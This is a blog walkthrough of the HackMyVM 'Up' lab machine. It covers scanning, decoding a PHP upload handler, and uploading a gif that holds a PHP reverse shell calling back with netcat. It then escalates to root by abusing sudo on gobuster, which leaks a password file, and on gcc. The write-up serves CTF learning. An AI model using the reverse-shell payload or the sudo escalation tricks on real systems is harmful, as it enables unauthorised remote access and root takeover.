HMV up - Zsm's blog

zsm

Time can create anything

浏览量：-，访问次数：-

Announcement

A ctfer? maybe.

Learn More

分类

标签

笔记 crypto docker golang HMV HTB k8s mac nodejs sagemath shell THM vscode vuln web windows wsl2

779 字

4 分钟

HMV up

2025-02-23

渗透

HMV

浏览量：加载中...，访问次数：加载中...

up#

靶场链接#

https://hackmyvm.eu/machines/machine.php?vm=Up

日常扫描#

1
┌──(kali㉿kali)-[~]
2
└─$ sudo arp-scan -l
3
[sudo] password for kali:
4
Sorry, try again.
5
[sudo] password for kali:
6
Interface: eth0, type: EN10MB, MAC: 12:37:b3:be:69:38, IPv4: 192.168.31.183
7
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
8
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
9
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
10
192.168.31.1    58:ea:1f:38:ff:17       (Unknown)
11
192.168.31.186  42:60:96:7b:26:bd       (Unknown: locally administered)
12
192.168.31.238  08:00:27:ba:dc:8f       (Unknown)
13

14
3 packets received by filter, 0 packets dropped by kernel
15
Ending arp-scan 1.10.0: 256 hosts scanned in 1.955 seconds (130.95 hosts/sec). 3 responded
16

17
┌──(kali㉿kali)-[~]
18
└─$ nmap 192.168.31.238
19
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-23 10:21 HKT
20
Nmap scan report for 192.168.31.238
21
Host is up (0.0012s latency).
22
Not shown: 999 closed tcp ports (reset)
23
PORT   STATE SERVICE
24
80/tcp open  http
25
MAC Address: 08:00:27:BA:DC:8F (Oracle VirtualBox virtual NIC)
26

27
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

先简单的用dirb扫一下

1
┌──(kali㉿kali)-[~]
2
└─$ dirb http://192.168.31.238
3

4
-----------------
5
DIRB v2.22
6
By The Dark Raver
7
-----------------
8

9
START_TIME: Sun Feb 23 10:33:50 2025
10
URL_BASE: http://192.168.31.238/
11
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
12

13
-----------------
14

15
GENERATED WORDS: 4612
16

17
---- Scanning URL: http://192.168.31.238/ ----
18
+ http://192.168.31.238/index.php (CODE:200|SIZE:4489)
19
==> DIRECTORY: http://192.168.31.238/javascript/
20
+ http://192.168.31.238/server-status (CODE:403|SIZE:279)
21
==> DIRECTORY: http://192.168.31.238/uploads/
22

23
---- Entering directory: http://192.168.31.238/javascript/ ----
24
==> DIRECTORY: http://192.168.31.238/javascript/jquery/
25

26
---- Entering directory: http://192.168.31.238/uploads/ ----
27
+ http://192.168.31.238/uploads/robots.txt (CODE:200|SIZE:1301)
28

29
---- Entering directory: http://192.168.31.238/javascript/jquery/ ----
30
+ http://192.168.31.238/javascript/jquery/jquery (CODE:200|SIZE:289782)
31
END_TIME: Sun Feb 23 10:34:08 2025
32
DOWNLOADED: 18448 - FOUND: 4

uploads估计是上传的文件，扫一下

1
┌──(kali㉿kali)-[~]
2
└─$ dirb http://192.168.31.238/uploads
3
DIRB v2.22
4
By The Dark Raver
5
-----------------
6

7
START_TIME: Sun Feb 23 10:35:27 2025
8
URL_BASE: http://192.168.31.238/uploads/
9
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
10

11

12
GENERATED WORDS: 4612
13

14
---- Scanning URL: http://192.168.31.238/uploads/ ----
15
+ http://192.168.31.238/uploads/robots.txt (CODE:200|SIZE:1301)
16

17
END_TIME: Sun Feb 23 10:35:32 2025
18
DOWNLOADED: 4612 - FOUND: 1

反弹shell#

打开得到

1
PD9waHAKaWYgKCRfU0VSVkVSWydSRVFVRVNUX01FVEhPRCddID09PSAnUE9TVCcpIHsKICAgICR0YXJnZXREaXIgPSAidXBsb2Fkcy8iOwogICAgJGZpbGVOYW1lID0gYmFzZW5hbWUoJF9GSUxFU1siaW1hZ2UiXVsibmFtZSJdKTsKICAgICRmaWxlVHlwZSA9IHBhdGhpbmZvKCRmaWxlTmFtZSwgUEFUSElORk9fRVhURU5TSU9OKTsKICAgICRmaWxlQmFzZU5hbWUgPSBwYXRoaW5mbygkZmlsZU5hbWUsIFBBVEhJTkZPX0ZJTEVOQU1FKTsKCiAgICAkYWxsb3dlZFR5cGVzID0gWydqcGcnLCAnanBlZycsICdnaWYnXTsKICAgIGlmIChpbl9hcnJheShzdHJ0b2xvd2VyKCRmaWxlVHlwZSksICRhbGxvd2VkVHlwZXMpKSB7CiAgICAgICAgJGVuY3J5cHRlZEZpbGVOYW1lID0gc3RydHIoJGZpbGVCYXNlTmFtZSwgCiAgICAgICAgICAgICdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6JywgCiAgICAgICAgICAgICdOT1BRUlNUVVZXWFlaQUJDREVGR0hJSktMTW5vcHFyc3R1dnd4eXphYmNkZWZnaGlqa2xtJyk7CgogICAgICAgICRuZXdGaWxlTmFtZSA9ICRlbmNyeXB0ZWRGaWxlTmFtZSAuICIuIiAuICRmaWxlVHlwZTsKICAgICAgICAkdGFyZ2V0RmlsZVBhdGggPSAkdGFyZ2V0RGlyIC4gJG5ld0ZpbGVOYW1lOwoKICAgICAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImltYWdlIl1bInRtcF9uYW1lIl0sICR0YXJnZXRGaWxlUGF0aCkpIHsKICAgICAgICAgICAgJG1lc3NhZ2UgPSAiRWwgYXJjaGl2byBzZSBoYSBzdWJpZG8gY29ycmVjdGFtZW50ZS4iOwogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICRtZXNzYWdlID0gIkh1Ym8gdW4gZXJyb3IgYWwgc3ViaXIgZWwgYXJjaGl2by4iOwogICAgICAgIH0KICAgIH0gZWxzZSB7CiAgICAgICAgJG1lc3NhZ2UgPSAiU29sbyBzZSBwZXJtaXRlbiBhcmNoaXZvcyBKUEcgeSBHSUYuIjsKICAgIH0KfQo/Pgo=

一眼base64，厨子启动

1
<?php
2
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
3
    $targetDir = "uploads/";
4
    $fileName = basename($_FILES["image"]["name"]);
5
    $fileType = pathinfo($fileName, PATHINFO_EXTENSION);
6
    $fileBaseName = pathinfo($fileName, PATHINFO_FILENAME);
7

8
    $allowedTypes = ['jpg', 'jpeg', 'gif'];
9
    if (in_array(strtolower($fileType), $allowedTypes)) {
10
        $encryptedFileName = strtr($fileBaseName,
11
            'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz',
12
            'NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm');
13

14
        $newFileName = $encryptedFileName . "." . $fileType;
15
        $targetFilePath = $targetDir . $newFileName;
16

17
        if (move_uploaded_file($_FILES["image"]["tmp_name"], $targetFilePath)) {
18
            $message = "El archivo se ha subido correctamente.";
19
        } else {
20
            $message = "Hubo un error al subir el archivo.";
21
        }
22
    } else {
23
        $message = "Solo se permiten archivos JPG y GIF.";
24
    }
25
}
26
?>

这个代码简单来说就是文件名进行了rot13操作，且只允许上传jpg和gif文件

echo ”< ?php system(‘nc -e /bin/bash 192.168.31.183 4444’); ?>” > zsm.gif

bp传上去试试呗

1
┌──(kali㉿kali)-[~]
2
└─$ nc -lvnp 4444
3
listening on [any] 4444 ...
4
connect to [192.168.31.183] from (UNKNOWN) [192.168.31.238] 48740
5
ls
6
access_denied.html
7
clue.txt
8
mfz.gif
9
robots.txt

home下的用户目录可以进，先把第一个flag拿了

提权#

1
sudo -l
2
Matching Defaults entries for www-data on debian:
3
    env_reset, mail_badpass,
4
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
5
    use_pty
6

7
User www-data may run the following commands on debian:
8
    (ALL) NOPASSWD: /usr/bin/gobuster

gobuster是提权点 gobuster无法对本地目录进行扫描，但可以使用-w参数将本地目录作为字典目录读取。因此，在本机运行http服务，在靶机运行gobuster，看靶机请求哪些文件。

1
sudo /usr/bin/gobuster dir -w "/root/rodgarpass" -u "http://192.168.31.183:8888"
2

3
┌──(kali㉿kali)-[~]
4
└─$ python3 -m http.server 8888
5
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
6
192.168.31.238 - - [23/Feb/2025 10:56:32] "GET / HTTP/1.1" 200 -
7
192.168.31.238 - - [23/Feb/2025 10:56:32] code 404, message File not found
8
192.168.31.238 - - [23/Feb/2025 10:56:32] "GET /958637c2-0c37-44a1-93ad-48c9eba3a07c HTTP/1.1" 404 -
9
192.168.31.238 - - [23/Feb/2025 10:56:32] code 404, message File not found
10
192.168.31.238 - - [23/Feb/2025 10:56:32] "GET /b45cffe084dd3d20d928bee85e7b0f2 HTTP/1.1" 404 -

b45cffe084dd3d20d928bee85e7b0f2是个md5值 -> string 结果不对wc，

1
echo -n string |md5sum
2
b45cffe084dd3d20d928bee85e7b0f21  -

nb，这个作者少打个1 切换成这个用户，再看看提权点，

1
rodgar@debian:~$ sudo -l
2
sudo -l
3
Matching Defaults entries for rodgar on debian:
4
    env_reset, mail_badpass,
5
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
6
    use_pty
7

8
User rodgar may run the following commands on debian:
9
    (ALL : ALL) NOPASSWD: /usr/bin/gcc, /usr/bin/make

gcc提权，写个binbash进去就行了

1
rodgar@debian:~$ sudo gcc -wrapper /bin/sh,-s .
2
sudo gcc -wrapper /bin/sh,-s .
3
 id
4
id
5
uid=0(root) gid=0(root) grupos=0(root)

-wrapper是gcc的参数，可以指定一个可执行文件，gcc会调用这个文件，并把gcc的参数传递给这个文件。 -s是交互式终端

HMV up

https://www.zhuangsanmeng.xyz/posts/hmv_up/

作者

zsm

发布于

2025-02-23

许可协议

MIT

HMV Airbind

Hgame2025_crypto

a ctfer on the load

up#

靶场链接#

日常扫描#

反弹shell#

提权#